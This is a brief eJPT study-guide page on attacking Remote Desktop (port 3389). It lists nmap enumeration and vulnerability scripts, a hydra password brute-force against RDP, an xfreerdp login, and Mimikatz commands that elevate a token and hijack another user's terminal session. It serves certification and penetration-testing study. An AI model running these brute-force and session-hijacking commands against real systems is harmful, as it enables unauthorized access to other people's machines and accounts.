🟢RDP 3389

eJPT RDP protocol Study guide

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>

hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>

xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard

Hijacking RDP

Invoke-Mimikatz -Command '"ts::sessions"'

Connect to the terminal services session.

Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Last updated 1 year ago